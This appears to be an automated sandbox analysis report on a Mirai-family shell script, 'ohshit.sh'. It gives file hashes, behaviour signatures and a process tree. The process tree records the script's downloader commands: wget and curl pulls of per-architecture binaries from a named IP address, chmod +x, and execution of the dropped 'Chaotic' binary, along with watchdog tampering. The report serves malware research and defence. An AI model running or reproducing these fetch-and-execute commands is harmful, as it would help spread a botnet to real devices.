Analysis
-
max time kernel
147s -
max time network
148s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
23-12-2024 02:25
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
ohshit.sh
-
Size
3KB
-
MD5
8cadf8766bc5de0f7f7df9bf000cd0aa
-
SHA1
fa6c2f9c7a20a3c1c6831d859d4b809aadf49567
-
SHA256
c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1
-
SHA512
8859f146c24023b97e34f53eda375ce9a0df64037806c86271d00a596a37097afbb7cfa4ffe1df2d58b4ed252fb048277ae8c3fc304be1551a33541390c8bac2
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 867 chmod 882 chmod 905 chmod 855 chmod 861 chmod 799 chmod 810 chmod 876 chmod 741 chmod 769 chmod 899 chmod 888 chmod 894 chmod 747 chmod 850 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/Chaotic 742 Chaotic /tmp/Chaotic 748 Chaotic /tmp/Chaotic 771 Chaotic /tmp/Chaotic 800 Chaotic /tmp/Chaotic 811 Chaotic /tmp/Chaotic 851 Chaotic /tmp/Chaotic 856 Chaotic /tmp/Chaotic 862 Chaotic /tmp/Chaotic 868 Chaotic /tmp/Chaotic 877 Chaotic /tmp/Chaotic 883 Chaotic /tmp/Chaotic 889 Chaotic /tmp/Chaotic 895 Chaotic /tmp/Chaotic 900 Chaotic /tmp/Chaotic 906 Chaotic -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic -
resource yara_rule behavioral3/files/fstream-5.dat upx behavioral3/files/fstream-6.dat upx behavioral3/files/fstream-7.dat upx behavioral3/files/fstream-8.dat upx -
description ioc Process File opened for reading /proc/788/status Chaotic File opened for reading /proc/805/status Chaotic File opened for reading /proc/2/status Chaotic File opened for reading /proc/11/status Chaotic File opened for reading /proc/16/status Chaotic File opened for reading /proc/22/status Chaotic File opened for reading /proc/72/status Chaotic File opened for reading /proc/355/status Chaotic File opened for reading /proc/814/status Chaotic File opened for reading /proc/330/status Chaotic File opened for reading /proc/383/status Chaotic File opened for reading /proc/672/status Chaotic File opened for reading /proc/709/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/706/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/77/status Chaotic File opened for reading /proc/154/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/227/status Chaotic File opened for reading /proc/424/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/13/status Chaotic File opened for reading /proc/80/status Chaotic File opened for reading /proc/111/status Chaotic File opened for reading /proc/121/status Chaotic File opened for reading /proc/701/status Chaotic File opened for reading /proc/792/status Chaotic File opened for reading /proc/3/status Chaotic File opened for reading /proc/14/status Chaotic File opened for reading /proc/24/status Chaotic File opened for reading /proc/687/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/filesystems cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/79/status Chaotic File opened for reading /proc/122/status Chaotic File opened for reading /proc/1/status Chaotic File opened for reading /proc/9/status Chaotic File opened for reading /proc/37/status Chaotic File opened for reading /proc/75/status Chaotic File opened for reading /proc/81/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/8/status Chaotic File opened for reading /proc/18/status Chaotic File opened for reading /proc/23/status Chaotic File opened for reading /proc/73/status Chaotic File opened for reading /proc/150/status Chaotic File opened for reading /proc/669/status Chaotic File opened for reading /proc/6/status Chaotic File opened for reading /proc/20/status Chaotic File opened for reading /proc/375/status Chaotic File opened for reading /proc/671/status Chaotic File opened for reading /proc/707/status Chaotic File opened for reading /proc/4/status Chaotic File opened for reading /proc/7/status Chaotic File opened for reading /proc/10/status Chaotic File opened for reading /proc/74/status Chaotic File opened for reading /proc/76/status Chaotic -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 803 wget 808 curl 809 cat 836 wget 844 curl 849 cat -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.m68k wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.i686 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mips wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm7 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm7 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.ppc curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.sparc curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mips64 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mpsl curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm6 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.m68k curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arc curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.i686 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm5 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86_64 wget File opened for modification /tmp/busybox cp File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arc wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.ppc wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.sh4 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mpsl wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm5 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm6 wget File opened for modification /tmp/Chaotic ohshit.sh File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86_64 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mips curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.sh4 wget
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:709 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:712
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc2⤵
- Writes file to tmp directory
PID:719
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arc2⤵PID:740
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-HR2vhc ub8ehJSePAfc9FYqZIT6.arc2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:742
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.x862⤵
- Writes file to tmp directory
PID:744
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.x862⤵PID:746
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-HR2vhc ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x862⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:748
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_642⤵
- Writes file to tmp directory
PID:750
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.x86_642⤵PID:768
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-HR2vhc ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:771
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.i6862⤵
- Writes file to tmp directory
PID:774
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.i6862⤵PID:798
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-HR2vhc ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:800
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:803
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:808
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.mips2⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-HR2vhc ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:811
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips642⤵
- System Network Configuration Discovery
PID:836
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips642⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:844
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.mips642⤵
- System Network Configuration Discovery
PID:849
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-HR2vhc ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:851
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl2⤵
- Writes file to tmp directory
PID:852
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.mpsl2⤵PID:854
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-HR2vhc ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:856
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm2⤵
- Writes file to tmp directory
PID:858
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm2⤵
- Writes file to tmp directory
PID:859
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm2⤵PID:860
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-HR2vhc ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:862
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm52⤵
- Writes file to tmp directory
PID:864
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm52⤵PID:866
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-456345969109443eb75cac42fc1b1b9a-systemd-timedated.service-HR2vhc ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:868
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm62⤵
- Writes file to tmp directory
PID:870
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm62⤵
- Writes file to tmp directory
PID:874
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm62⤵PID:875
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:877
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm72⤵
- Writes file to tmp directory
PID:879
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm72⤵
- Writes file to tmp directory
PID:880
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm72⤵PID:881
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:883
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc2⤵
- Writes file to tmp directory
PID:885
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.ppc2⤵PID:887
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:889
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc2⤵PID:891
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.sparc2⤵PID:893
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:895
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k2⤵
- Writes file to tmp directory
PID:896
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.m68k2⤵PID:898
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:900
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh42⤵
- Writes file to tmp directory
PID:902
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.sh42⤵PID:904
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:906
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD5fc32f8a67d1b0590d25d38c2614d72d9
SHA1be2059efd5d4fcd999672caa7970019eb160bf13
SHA2561bd4414e839b5d0be6d814d0d3daae5f64df063fb87865d32fbe815e02d587fa
SHA512b99e74e7b031a5f21b1fece80c6976718a33efb3da3c13949fa8053f1e47970f335766a4376f33edff2dfaf79b144669ef28387dc73e9ff34cb77c94b47b9047
-
Filesize
36KB
MD52bd66161d02afa8b3891285f7f9cbfdf
SHA12ca808e492bf74c2cb8576f72212d3a88a7bd0af
SHA25621d663bd5974d560e377afd55d4ebaa86f82427db24b9f888197d1461bba80d1
SHA5128ded171bb4c03ec978b32048f088f167bc7433192befadb074c6cde71e67be934c9878bd5a1c4b42e5bcfac5682f93882df65ac9cfbcf633e8b450b11bda2574
-
Filesize
37KB
MD55a0517d1fa30a6fab030e281d2957328
SHA14abefe8b469f8e7efebb4756ea5d0963cff00161
SHA256e9b0591495af8c41cc5d6bb3dc368fc2df912322fd62be36c378f1b854764290
SHA512f387c8c2e996ba98b9a100c260959d3454f75d4580e5862209c7e2338b3a6fb15213191681536912b45cac0c05427c925040f3bf64bc224a75eb12721ca760bc
-
Filesize
43KB
MD550bf10e8cdfe9739c0cf974778e0bda1
SHA1212c2d9325b1c4a04ab78073f9094ff0010d3e6e
SHA256b105e2e16e62e0156c93ec6adb3786aac39387b326c151bd4740e705a7ab99e4
SHA5123db5b2334a7c5d966ed36c4ea61c31e5938e07aae63ece079ac421f60e83caca5ab3f4ec73279378cc95b2dc7e214912c2caeb42426c4cd00a4d9ebc28c65c74
-
Filesize
95KB
MD515ad8070f1389c13cc3414691809e9cb
SHA16a54eb1416971a44f79c14dc1a04b63526b5f7a4
SHA2567652dc3a15297526f43d44410b50e201ae335b89812a659a98e81b380ca7a391
SHA5126f2879dcec63810a200b28709ff927f5622038fd39b2973fc594d04c4190715344b48b47137bf6b5a4b215a6b96fc5ffbe4bf98c7fd438984e8c0002cc81fd53
-
Filesize
857KB
MD5a39fe8036e559ce804e26518061e59ff
SHA18df27f6e8a48b762d945ea2f2b87390c80acd4de
SHA2563180df117342646dcdc4c436f95b41e15587e2238ec59064b4b06c065d56cf38
SHA512e97756f316fceef7360e789362648529eea50eb6f7cc56cf654b3fc43ca61f0e4d9f366ed8fd59b73dd5a49615e935e9f53686d15f9a83c7fa472a70e7196d0d
-
Filesize
113KB
MD567866b2fa89306af228090376b5ee71d
SHA1589a43771d9ced3e2c57b0f81b68d5c1870979b6
SHA25611ccfcb325127d662796d16aaf51a64ca1525239bee5b18591a7cca45a3c5fd5
SHA5127f67170a16b0f499a507c79d4ec70a4aaf2bc5de3b863440418b73203aff80bb3c4b3283b9601f30262c5cf197be86fbf473957b9f004ac9c815c7519bce72e4